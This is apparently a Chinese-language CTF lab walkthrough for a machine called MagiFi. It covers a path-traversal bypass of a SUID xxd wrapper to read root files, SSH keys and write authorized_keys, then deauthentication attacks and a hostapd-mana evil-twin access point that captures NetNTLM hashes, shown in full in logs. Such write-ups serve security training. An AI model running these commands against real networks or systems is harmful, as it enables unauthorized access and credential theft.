        puts("    -O <file>   specify output file (only horcruxes are allowed).");
    } else {
        perror("Error forking");
    }
}

int main(int argc, char **argv) {
    uid_t uid = getuid();
    struct passwd *pw = getpwuid(uid);
    if (!pw || strcmp(pw->pw_name, "tom.riddle") != 0) {
        fwrite("You are not worthy to handle the Horcrux!\n", 1, 42, stderr);
        return 1;
    }

    if (argc <= 1 || strcmp(argv[1], "-h") == 0 || strcmp(argv[1], "--help") == 0) {
        show_help();
        return 1;
    }

    char *outfile = NULL;
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-O") == 0 && i + 1 < argc) {
            outfile = argv[i + 1];
            argv[i + 1] = NULL; // 模拟汇编里把 argv[i+1] 清零
            i++; // 跳过文件名
        }
    }

    if (!outfile || strlen(outfile) == 0) {
        fwrite("Error: Output file can't be empty, use the -O option.\n", 1, 54, stderr);
        show_help();
        return 1;
    }

    // 文件名必须以 ".horcrux.png" 结尾
    size_t len = strlen(outfile);
    if (len < 12 || strcmp(outfile + len - 12, ".horcrux.png") != 0) {
        fwrite("Not every wizards can use or destroy a Horcrux!\n", 1, 49, stderr);
        return 1;
    }

    // 禁止写 /root 和 /etc
    if (strncmp(outfile, "/root/", 6) == 0 || strncmp(outfile, "/etc/", 5) == 0) {
        fwrite("I hate dealing with Muggle gadgets!\n", 1, 36, stderr);
        return 1;
    }

    // 打开文件
    int fd = open(outfile, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) {
        perror("Error opening output file");
        return 1;
    }

    // fork/exec xxd
    pid_t pid = fork();
    if (pid == 0) {
        dup2(fd, STDOUT_FILENO);
        close(fd);
        char *xxd_argv[] = {"/usr/bin/xxd", NULL};
        execvp("/usr/bin/xxd", xxd_argv);
        _exit(1);
    } else if (pid > 0) {
        wait(NULL);
    } else {
        perror("Error forking");
        close(fd);
        return 1;
    }

    return 0;
}

          ┌───────────────┐
          │   程序启动     │
          └───────┬───────┘
                  │
                  ▼
         ┌─────────────────┐
         │ 获取当前用户 UID │
         └───────┬─────────┘
                 │
                 ▼
         ┌────────────────────────────┐
         │ 用户是否是 tom.riddle?     │
         └───────┬───────────────┘
           是    │    否
           │     ▼
           │  fwrite("You are not worthy...\n")
           │  return 1
           │
           ▼
┌─────────────────────────────┐
│ argc <= 1 或 argv[1] 为 -h │
│ 或 --help                    │
└─────────┬───────────────────┘
          │
          ▼
      show_help() ──┐
          │         │
          ▼         │
       return 1     │
                   │
           ┌───────▼──────────┐
           │ 遍历 argv 参数    │
           │ 查找 -O 选项       │
           └───────┬──────────┘
                   │
           是否指定输出文件?
           │       │
           │       ▼
           │  fwrite("Error: Output file can't be empty...")
           │  show_help()
           │  return 1
           │
           ▼
  ┌──────────────────────────┐
  │ 文件名是否合法?           │
  │ 1. 以 ".horcrux.png" 结尾 │
  │ 2. 不在 /root/ 或 /etc/   │
  └─────────┬────────────────┘
      否     │      是
      │      ▼
fwrite("Not every wizards can ...") 继续执行
或 fwrite("I hate dealing with ...")  
return 1
      │
      ▼
┌───────────────────────────┐
│ 打开输出文件 fd            │
└─────────┬─────────────────┘
          │
          ▼
      fork() ──────┐
          │        │
      子进程      父进程
          │        │
  dup2(fd, STDOUT) │
  close(fd)        │
  execvp("/usr/bin/xxd") │
          │        ▼
       _exit(1)   wait(NULL)
          │
          ▼
       程序结束

二进制分析总结

安全检查：

用户检查：必须以 tom.riddle 用户运行（strcmp 在地址 0x1404）
路径黑名单：阻止参数以 /root/ 或 /etc/ 开头（strncmp 在 0x1552 和 0x1581）
输出文件：必须指定 -O .horcrux.png（strcmp 在 0x160D）

功能：

封装 /usr/bin/xxd，将标准输出重定向到指定输出文件
SUID 权限运行，在执行 execvp 前不会降权

漏洞 —— 路径检查绕过

路径检查使用 strncmp，只检查参数是否以 **/root/** 或 **/etc/** 开头。
因此可以通过路径遍历来绕过：

# 这个会被阻止：
xxd_horcrux /root/root.txt -O .horcrux.png

# 这个可以绕过检查：
xxd_horcrux /home/../root/root.txt -O .horcrux.png

利用步骤

首先切换到 **tom.riddle** 用户（这是二进制的要求）
读取敏感文件（例如 root flag 或 SSH key）：

cd /tmp
xxd_horcrux /home/../root/root.txt -O .horcrux.png
cat .horcrux.png

或者读取 root 的 SSH 密钥：

xxd_horcrux /home/../root/.ssh/id_rsa -O .horcrux.png
xxd -r .horcrux.png   # 如果输出的是 hex

替代方法 —— 写入 **authorized_keys**（如果可以使用 xxd -r）：

# 生成你的公钥并进行 hex 编码
echo "ssh-rsa AAAA... your-key" | xxd > /tmp/key.hex

# 使用 xxd_horcrux 写入 root 授权密钥（路径检查同样适用）
xxd_horcrux -r /tmp/key.hex -O /home/../root/.ssh/authorized_keys

核心洞察

strncmp 仅进行前缀匹配检查
因此 路径遍历（/../） 可以有效绕过黑名单 /root/ 或 /etc/ 的限制

无线网络渗透测试

sudo -l

(remote) harry_potter@MagiFi:/usr/bin$ sudo -l
Matching Defaults entries for harry_potter on MagiFi:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User harry_potter may run the following commands on
        MagiFi:
    (root) NOPASSWD: /usr/sbin/aireplay-ng,
        /usr/sbin/airmon-ng, /usr/sbin/airodump-ng,
        /usr/bin/airdecap-ng, /usr/bin/hostapd-mana

一、`/usr/sbin/aireplay-ng`

功能：属于Aircrack-ng套件，用于向无线网络注入数据包以生成流量，辅助破解WPA/WPA2密钥。 核心用途：

支持多种攻击模式，如解除认证（Deauthentication）、伪造认证（Fake Authentication）、ARP请求重放等
通过生成流量捕获WPA握手包，为后续破解提供数据支持。

# 强制解除认证攻击（使客户端断开连接）
aireplay-ng -0 10 -a BSSID -c STATION wlan0mon

二、`/usr/sbin/airmon-ng`

功能：管理无线网卡的监控模式（Monitor Mode），用于捕获所有经过网卡的数据包。 核心用途：

启动/停止监控模式：airmon-ng start wlan0。
检查干扰进程（如网络管理器）并终止：

airmon-ng check kill

适用场景：无线网络渗透测试、流量嗅探。

三、`/usr/sbin/airodump-ng`

功能：无线网络扫描与数据包捕获工具，常用于识别目标网络及收集握手包。 核心功能：

实时显示AP的SSID、BSSID、信号强度、加密方式等信息
支持按频道、BSSID过滤，优化数据捕获效率。

# 锁定目标AP并捕获握手包
airodump-ng --bssid 00:11:22:33:44:55 -c 6 --write capture wlan0mon

四、`/usr/bin/airdecap-ng`

功能：解密WPA/WPA2加密的捕获文件（如.cap或.ivs），提取明文流量。 核心用途：

需提供目标网络的ESSID和密码进行解密。
支持剥离无线协议头，生成纯数据文件

五、`/usr/bin/hostapd-mana`

功能：恶意接入点（Evil Twin）工具，用于创建仿冒Wi-Fi热点实施中间人攻击。 核心功能：

结合Karma攻击，自动响应客户端探测请求，伪造合法热点
支持SSL剥离（SSLstrip）、Cookie窃取等攻击。 风险提示：
需配合hostapd配置文件及DHCP服务实现钓鱼网络。
可能被用于非法入侵，需严格授权使用

看来这一关和网络有关，看一下相关配置：

网卡

(remote) harry_potter@MagiFi:/usr/bin$ ip -br addr
lo               UNKNOWN        127.0.0.1/8 ::1/128 
enp0s3           UP             192.168.0.106/24 fe80::a00:27ff:fed2:ba97/64 
docker0          DOWN           172.17.0.1/16 
wlan0            DOWN           
wlan1            DOWN           
wlan2            DOWN           
wlan3            DOWN           
wlan4            DOWN           
wlan5            DOWN           
wlan6            DOWN           
wlan60           DOWN           
hwsim0           DOWN           
veth1@if77       UP             10.200.1.1/24 fe80::80ca:15ff:fef4:e359/64 
veth2@if79       UP             10.200.2.1/24 fe80::c47e:55ff:fe79:201a/64

监听网卡

由于含有很多无线网卡，根据传统步骤，先排查并终止可能干扰无线网卡监控模式的进程。

(remote) harry_potter@MagiFi:/home/harry_potter$ sudo /usr/sbin/airmon-ng check kill  # 终止干扰进程

Killing these processes:

    PID Name
    639 dhclient

(remote) harry_potter@MagiFi:/home/harry_potter$ sudo /usr/sbin/airmon-ng start wlan0  # 开启监听模式


PHY     Interface       Driver          Chipset

phy10   wlan0           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211

                (mac80211 monitor mode vif enabled for [phy10]wlan0 on [phy10]wlan0mon)
                (mac80211 station mode vif disabled for [phy10]wlan0)
phy11   wlan1           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
phy12   wlan2           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
phy13   wlan3           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
phy14   wlan4           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
phy15   wlan5           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
phy16   wlan6           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
phy70   wlan60          mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211

发现网卡接口为wlan0mon

扫描不同频段的网络，分别是 2.4GHz 和 5GHz

(remote) harry_potter@MagiFi:/home/harry_potter$ sudo /usr/sbin/airodump-ng wlan0mon   # 2.4GHz

sudo /usr/sbin/airodump-ng wlan0mon --band a   # 5GHz

这里的监听不要关，后面每一步都需要用到这个，这个就像眼睛，用来辅助进行攻击的，添加ssh凭证多开几个终端进行下面的攻击！

BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 F0:9F:C2:71:22:15  -28       15        0    0  44   54e  WPA2 CCMP   MGT  wifi-college
 F0:9F:C2:71:22:17  -28       15        0    0  40   54e  WPA2 CCMP   MGT  wifi-college
 F0:9F:C2:71:22:16  -28       15        0    0  36   54e  WPA2 CCMP   MGT  wifi-college

检测到三个 WPA2 管理（MGT）访问点以及 WiFi-College表明了一些情况：

该无线网络采用 WPA2-Enterprise（企业级认证），即通过 802.1X 协议 和 RADIUS 服务器 实现身份验证
wifi-college 是该无线网络的 ESSID（网络名称），通常由网络管理员设置。
- 可能是某高校的公共 Wi-Fi（如教学区、宿舍区）。
- 使用 WPA2-Enterprise 保障学生、教职工的安全接入。
结合之前的工具可以猜测接下来是利用伪造wifi进行中间人攻击或数据窃取。（fake APs），比如可以捕获用户凭据及其 NetNTLM hash以进行以后的破解。

Fake APs

首先需要进行解除验证攻击，就是让他们重新连wifi，我们伪造一下，让他们发送认证信息给我们：

通过强制网络重连，迫使客户端与 AP 重新协商密钥，从而暴露握手包和证书信息。攻击者利用此过程实施中间人攻击，窃取敏感数据。

重置网络状态：断开连接后，客户端需重新协商加密密钥（如 PMK），此过程会重新生成握手包，增加攻击者捕获的概率。

aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan0mon 
aireplay-ng -0 0 -a F0:9F:C2:71:22:16 wlan0mon
aireplay-ng -0 0 -a F0:9F:C2:71:22:17 wlan0mon

-0 表示取消认证
1 表示要发送的取消认证次数（如果需要，可以发送多个）；0 表示连续发送
-a 是接入点的 MAC 地址
-c 是要取消身份验证的客户端的 MAC 地址；如果省略此项，则发送广播取消身份验证（并非总是有效）

# mkdir /tmp/scan
sudo /usr/sbin/airodump-ng wlan0mon --band a -c 36,40,44 -w /tmp/scan/

 CH 40 ][ Elapsed: 2 mins ][ 2026-01-25 11:13 ][ WPA ha 
                                                        
 BSSID              PWR  Beacons    #Data, #/s  CH   MB 
                                                        
 F0:9F:C2:71:22:15  -28      443        0    0  44   54 
 F0:9F:C2:71:22:17  -28      438        0    0  40   54 
 F0:9F:C2:71:22:16  -28      440       92    0  36   54 
                                                        
 BSSID              STATION            PWR   Rate    Lo 
                                                        
 F0:9F:C2:71:22:16  64:32:A8:07:6C:43  -29    6e- 6e     0       34  PMKID                                      
 F0:9F:C2:71:22:16  64:32:A8:07:6C:41  -29    0 -24e     0       15                                             
 F0:9F:C2:71:22:16  64:32:A8:07:6C:40  -29    0 -24e     0       13                                             
 F0:9F:C2:71:22:16  64:32:A8:07:6C:42  -29    6e-54e     0       60  PMKID

BSSID CH 状态

F0:9F:C2:71:22:15 44 空 AP（无客户端）

F0:9F:C2:71:22:17 40 空 AP（无客户端）

F0:9F:C2:71:22:16 36 ✅ 有客户端（还有 PMKID）

真正“活着”的目标只有 **…:16**（CH 36）

sudo airodump-ng -c 36 --band a --bssid F0:9F:C2:71:22:16 -w /tmp/scan wlan0mon

sudo aireplay-ng -0 0 -a F0:9F:C2:71:22:16 wlan0mon

目标接收到就会立马进行停止，然后尝试重连，我们则使使用工具保存流量包，可以查看相关信息：

(remote) harry_potter@MagiFi:/home/harry_potter$ ls -la /tmp/scan
total 228
drwxr-xr-x  2 harry_potter harry_potter   4096 Jan 25 11:11 .
drwxrwxrwt 14 root         root           4096 Jan 25 11:19 ..
-rw-r--r--  1 root         root          30600 Jan 25 11:13 -01.cap
-rw-r--r--  1 root         root           1118 Jan 25 11:13 -01.csv
-rw-r--r--  1 root         root           1122 Jan 25 11:13 -01.kismet.csv
-rw-r--r--  1 root         root           9917 Jan 25 11:13 -01.kismet.netxml
-rw-r--r--  1 root         root         170884 Jan 25 11:13 -01.log.csv

然后按照作者的命令进行提取：

(remote) harry_potter@MagiFi:/tmp/scan$ tshark -r -01.cap -Y "ssl.handshake.type == 11" -V | grep -ow -E '(countryName=\\w+)|(stateOrProvinceName=.+)|(localityName=.+)|(organizationName=.+)|(emailAddress=.+)|(commonName=.+)' | cut -d ',' -f 1 | sed 's/)//' | sort -u
commonName=Hogwarts Certificate Authority
emailAddress=ca@hogwarts.htb
emailAddress=server@hogwarts.htb
localityName=Madrid
organizationName=Hogwarts
stateOrProvinceName=Madrid

这里我们也可以直接用wireshark进行读取

过滤出 SSL/TLS 握手类型为 11 的数据包（即证书消息，包含证书内容）

然后就是伪造 wifi，grep出来的就是需要伪造部分：

FreeRADIUS 是一款开源的 RADIUS 协议服务器，主要用于实现网络资源的 集中化认证、授权和计费（AAA）。其核心功能是为网络设备（如无线接入点、路由器、VPN 服务器等）提供用户身份验证服务，并根据策略控制用户对资源的访问权限。

harry_potter@MagiFi:/tmp$ mkdir fakeap
harry_potter@MagiFi:/tmp$ cd fakeap/
harry_potter@MagiFi:/tmp/fakeap$ cp -R /etc/freeradius/3.0/certs certs
harry_potter@MagiFi:/tmp/fakeap$ chmod -R 777 certs/
harry_potter@MagiFi:/tmp/fakeap$ nano certs/ca.cnf
harry_potter@MagiFi:/tmp/fakeap$ grep '^\[certificate_' -A 7 certs/ca.cnf
[certificate_authority]
countryName             = ES
stateOrProvinceName     = Madrid
localityName            = Madrid
organizationName        = Hogwarts
emailAddress            = ca@hogwarts.htb
commonName              = "Hogwarts Certificate Authority"

harry_potter@MagiFi:/tmp/fakeap$ nano certs/server.cnf
harry_potter@MagiFi:/tmp/fakeap$ grep '^\[server' -A 7 certs/server.cnf 
[server]
countryName             = ES
stateOrProvinceName     = Madrid
localityName            = Madrid
organizationName        = Hogwarts
emailAddress            = server@hogwarts.htb
commonName              = "Hogwarts Certificate Authority"

harry_potter@MagiFi:/tmp/fakeap$ cd certs/
harry_potter@MagiFi:/tmp/fakeap/certs$ make
openssl dhparam -out dh -2 2048
Generating DH parameters, 2048 bit long safe prime, generator 2
This is going to take a long time
..................................+...............................................................................................+...++*++*++*++*
openssl req -new  -out server.csr -keyout server.key -config ./server.cnf
Generating a RSA private key
................................................................................................+++++
...+++++
writing new private key to 'server.key'
-----
chmod g+r server.key
openssl req -new -x509 -keyout ca.key -out ca.pem \
        -days '60' -config ./ca.cnf \
        -passin pass:'whatever' -passout pass:'whatever'
Generating a RSA private key
.........................................................+++++
.....................+++++
writing new private key to 'ca.key'
-----
chmod g+r ca.key
openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr  -key 'whatever' -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf
Using configuration from ./server.cnf
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number: 1 (0x1)
        Validity
            Not Before: Jun 22 08:05:42 2025 GMT
            Not After : Aug 21 08:05:42 2025 GMT
        Subject:
            countryName               = ES
            stateOrProvinceName       = Madrid
            organizationName          = Hogwarts
            commonName                = Hogwarts Certificate Authority
            emailAddress              = server@hogwarts.htb
        X509v3 extensions:
            X509v3 Extended Key Usage: 
                TLS Web Server Authentication
            X509v3 CRL Distribution Points: 

                Full Name:
                  URI:http://www.example.com/example_ca.crl

Certificate is to be certified until Aug 21 08:05:42 2025 GMT (60 days)

Write out database with 1 new entries
Data Base Updated
openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12  -passin pass:'whatever' -passout pass:'whatever'
chmod g+r server.p12
openssl pkcs12 -in server.p12 -out server.pem -passin pass:'whatever' -passout pass:'whatever'
chmod g+r server.pem
server.pem: OK
openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der
openssl ca -gencrl -keyfile ca.key -cert ca.pem -config ./ca.cnf -out ca-crl.pem -key 'whatever'
Using configuration from ./ca.cnf
openssl crl -in ca-crl.pem -outform der -out ca.crl
rm ca-crl.pem
openssl req -new  -out client.csr -keyout client.key -config ./client.cnf
Generating a RSA private key
.......................................................................................................................+++++
...........+++++
writing new private key to 'client.key'
-----
chmod g+r client.key
openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr  -key 'whatever' -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf
Using configuration from ./client.cnf
Check that the request matches the signature
Signature ok
The countryName field is different between
CA certificate (ES) and the request (FR)
make: *** [Makefile:120: client.crt] Error 1

然后利用eap_user规定 fakeAP 接收的信息有哪些：

mana.eap_user 是 无线攻击工具 Mana 的 EAP 认证配置文件，用于定义客户端与无线接入点（AP）之间使用的 EAP 认证协议及其支持的子认证方法。

字段	含义
`*`	通配符，表示默认配置适用于所有 EAP 类型。
`PEAP`	使用 TLS 加密的 EAP 方法，需服务器证书验证。
`TTLS`	通过 TLS 隧道传输其他认证协议（如 `MSCHAPv2` ），需服务器证书。
`TLS`	纯 TLS 认证，需客户端和服务端证书双向验证。
`FAST`	基于 TLS 的快速认证，依赖预共享密钥（PSK）。
`"t"`	可能为测试模式标记，启用特定调试或攻击逻辑（需结合工具文档）。
`TTLS-PAP`	TTLS 隧道内使用 PAP 明文密码认证（安全性低，易被破解）。
`MSCHAPv2`	微软挑战握手认证协议，广泛用于 Windows 网络。
`[2]`	可能表示配置版本或子配置块编号，用于多场景切换。

harry_potter@MagiFi:/tmp/fakeap/certs$ nano mana.eap_user
harry_potter@MagiFi:/tmp/fakeap/certs$ cat mana.eap_user 
*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]

最后使用从目标访问点获得的数据创建配置文件，例如 SSID，安全设置和接口。

harry_potter@MagiFi:/tmp/fakeap/certs$ nano mana.conf 
harry_potter@MagiFi:/tmp/fakeap/certs$ cat mana.conf 
ssid=wifi-college
interface=wlan1
driver=nl80211
channel=1
hw_mode=g
ieee8021x=1
eap_server=1
eapol_key_index_workaround=0
eap_user_file=/tmp/fakeap/certs/mana.eap_user
ca_cert=/tmp/fakeap/certs/ca.pem
server_cert=/tmp/fakeap/certs/server.pem
private_key=/tmp/fakeap/certs/server.key
private_key_passwd=whatever
dh_file=/tmp/fakeap/certs/dh
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP TKIP
mana_wpe=1
mana_credout=/tmp/fakeap/certs/hostapd.credout
mana_eapsuccess=1
mana_eaptls=1

然后是利用hostapd-mana按照配置文件生成节点，开始广播 SSID 并处理身份验证请求，但是会报错：

harry_potter@MagiFi:/tmp$ sudo hostapd-mana mana.conf
Configuration file: mana.conf
MANA: Captured credentials will be written to file '/tmp/hostapd.credout'.
Could not read interface wlan1                   flags: No such device
nl80211: Driver does not support authentication/association or connect commands
nl80211: deinit ifname=wlan1                     disabled_11b_rates=0
Could not read interface wlan1                   flags: No such device
nl80211 driver initialization failed.
wlan1                   : interface state UNINITIALIZED->DISABLED
wlan1                   : AP-DISABLED 
hostapd_free_hapd_data: Interface wlan1                  wasn't started
harry_potter@MagiFi:/tmp$ ip link show wlan1
16: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
    link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff

因为没有设置监听，所以设置一个监听，另开一个终端进行操作！

harry_potter@MagiFi:/tmp/fakeap/certs$ sudo hostapd-mana mana.conf
Configuration file: mana.conf
MANA: Captured credentials will be written to file '/tmp/fakeap/certs/hostapd.credout'.
Using interface wlan1 with hwaddr 02:00:00:00:01:00 and ssid "wifi-college"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED

可以了！！！

然后利用靶机作者写的一个脚本，对所有节点进行挨个解除认证：

harry_potter@MagiFi:/tmp$ cat deauth.sh 
#!/bin/bash

wlan1="wlan3"
wlan2="wlan4"
wlan3="wlan5"

bssid1Channel="44"
bssid2Channel="36"
bssid3Channel="40"

bssid1="F0:9F:C2:71:22:15"
bssid2="F0:9F:C2:71:22:16"
bssid3="F0:9F:C2:71:22:17"

check_monitor_mode() {
  interface=$1
  channel=$2
  mode=$(iwconfig ${interface}mon 2>/dev/null | grep "Mode:Monitor")
  if [ -z "$mode" ]; then
    sudo airmon-ng start $interface $channel
  fi
}

run_aireplay() {
  interface=$1
  bssid=$2
  sudo aireplay-ng -0 30 -a $bssid ${interface}mon
}

check_monitor_mode $wlan1 $bssid1Channel
check_monitor_mode $wlan2 $bssid2Channel
check_monitor_mode $wlan3 $bssid3Channel

echo "Running deauthentication attack..."

run_aireplay $wlan1 $bssid1 &
run_aireplay $wlan2 $bssid2 &
run_aireplay $wlan3 $bssid3 &

wait

 (remote) harry_potter@MagiFi:/tmp/fakeap/certs$ sudo hostapd-mana mana.conf
Configuration file: mana.conf
MANA: Captured credentials will be written to file '/tmp/fakeap/certs/hostapd.credout'.
Using interface wlan1 with hwaddr 02:00:00:00:01:00 and ssid "wifi-college"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED 
cd ^H^Hwlan1: STA 64:32:a8:07:6c:42 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:42 IEEE 802.11: associated (aid 1)
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:42
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: Hogwarts\minerva.mcgonagall
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
wlan1: STA 64:32:a8:07:6c:41 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:41 IEEE 802.11: associated (aid 2)
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: associated (aid 3)
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:41
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: associated (aid 4)
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:43
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 1: Hogwarts\minerva.mcgonagall
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:40
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: Hogwarts\albus.dumbledore
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 0: Hogwarts\rubeus.hagrid
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP EAP-MSCHAPV2 ASLEAP user=minerva.mcgonagall | asleap -C e8:c6:2b:ec:e7:ee:bb:5c -R 0b:4d:f5:5b:b8:28:f3:21:32:77:9a:79:14:fb:d3:a2:5a:aa:8d:fa:de:be:39:7e
MANA EAP EAP-MSCHAPV2 JTR | minerva.mcgonagall:$NETNTLM$e8c62bece7eebb5c$0b4df55bb828f32132779a7914fbd3a25aaa8dfadebe397e:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | minerva.mcgonagall::::0b4df55bb828f32132779a7914fbd3a25aaa8dfadebe397e:e8c62bece7eebb5c
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 5d 17 b4 75 e1 6c a5 11 71 7d d8 db 8f 8c e3 f2
MANA EAP Identity Phase 0: Hogwarts\tom.riddle
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: Hogwarts\rubeus.hagrid
MANA EAP EAP-MSCHAPV2 ASLEAP user=rubeus.hagrid | asleap -C 32:c9:d8:fc:a7:e3:4b:4f -R 57:6a:78:08:61:dc:22:a0:21:ab:db:f0:25:99:8e:55:cf:50:99:95:06:eb:c7:36
MANA EAP EAP-MSCHAPV2 JTR | rubeus.hagrid:$NETNTLM$32c9d8fca7e34b4f$576a780861dc22a021abdbf025998e55cf50999506ebc736:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | rubeus.hagrid::::576a780861dc22a021abdbf025998e55cf50999506ebc736:32c9d8fca7e34b4f
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 7a 45 0f 5f 4b 08 b9 69 3f f5 ff d1 03 ac 59 36
MANA EAP Identity Phase 1: Hogwarts\tom.riddle
MANA EAP EAP-MSCHAPV2 ASLEAP user=tom.riddle | asleap -C ac:61:40:15:03:00:fe:00 -R ad:bd:05:09:6a:52:b2:bf:69:c4:2c:50:08:ca:b0:18:7e:d1:c1:4c:6b:0e:ec:d2
MANA EAP EAP-MSCHAPV2 JTR | tom.riddle:$NETNTLM$ac6140150300fe00$adbd05096a52b2bf69c42c5008cab0187ed1c14c6b0eecd2:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | tom.riddle::::adbd05096a52b2bf69c42c5008cab0187ed1c14c6b0eecd2:ac6140150300fe00
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 77 ef 35 cf 2e 10 79 68 70 df 3e 70 f6 d4 b0 e1
MANA EAP Identity Phase 1: Hogwarts\albus.dumbledore
MANA EAP EAP-MSCHAPV2 ASLEAP user=albus.dumbledore | asleap -C 4e:f6:8e:3b:4b:fc:88:e8 -R 63:ad:f2:7c:45:b9:6a:99:7c:46:66:ac:14:70:d0:f4:31:8e:9f:b6:ea:04:e8:5b
MANA EAP EAP-MSCHAPV2 JTR | albus.dumbledore:$NETNTLM$4ef68e3b4bfc88e8$63adf27c45b96a997c4666ac1470d0f4318e9fb6ea04e85b:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | albus.dumbledore::::63adf27c45b96a997c4666ac1470d0f4318e9fb6ea04e85b:4ef68e3b4bfc88e8
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): ce cd d7 f4 a5 cc 68 42 65 c2 a2 35 0e e5 75 e4
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: associated (aid 1)
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:40
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: Hogwarts\rubeus.hagrid
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: Hogwarts\rubeus.hagrid
MANA EAP EAP-MSCHAPV2 ASLEAP user=rubeus.hagrid | asleap -C b0:19:36:03:f4:e2:88:74 -R 3b:01:17:93:19:e9:70:f7:39:80:91:b6:61:14:2b:ae:db:34:00:d0:b3:f5:6a:c2
MANA EAP EAP-MSCHAPV2 JTR | rubeus.hagrid:$NETNTLM$b0193603f4e28874$3b01179319e970f7398091b661142baedb3400d0b3f56ac2:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | rubeus.hagrid::::3b01179319e970f7398091b661142baedb3400d0b3f56ac2:b0193603f4e28874
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 50 e2 1b a2 49 a6 c5 32 b6 45 38 36 ff bf d6 d5

节点被解除认证以后尝试重连就会连接到伪造 wifi 上，发送我们需要的 NTLM hash 过来！！！！

所以这里手动也是可以的，只不过要搞很多次。。。

三个kali终端的情况如下：

# kali1 监听
 CH 128 ][ Elapsed: 10 mins ][ 2025-06-22 13:20 ][ WPA handshake: F0:9F:C2:71:22:16 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 02:00:00:00:01:00  -28     3409      143    0   1   54        CCMP   MGT  wifi-college                                                                                                     
 F0:9F:C2:71:22:15  -29      265        0    0  44   54e  WPA2 CCMP   MGT  wifi-college                                                                                                     
 F0:9F:C2:71:22:16  -29      264       58    0  36   54e  WPA2 CCMP   MGT  wifi-college                                                                                                     
 F0:9F:C2:71:22:17  -29      267       87    0  40   54e  WPA2 CCMP   MGT  wifi-college                                                                                                     

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 02:00:00:00:01:00  64:32:A8:07:6C:40  -29    1 - 1      0      121  PMKID  wifi-college                                                                                                     
 02:00:00:00:01:00  64:32:A8:07:6C:43  -29    6e- 1      0      193  PMKID  wifi-college                                                                                                     
 02:00:00:00:01:00  64:32:A8:07:6C:42  -29    1 - 1      0      157  PMKID  wifi-college                                                                                                     
 F0:9F:C2:71:22:16  64:32:A8:07:6C:41  -29    6e- 6e     0      166  PMKID  wifi-college

# kali2 伪造节点
harry_potter@MagiFi:/tmp/fakeap/certs$ sudo hostapd-mana mana.conf
Configuration file: mana.conf
MANA: Captured credentials will be written to file '/tmp/fakeap/certs/hostapd.credout'.
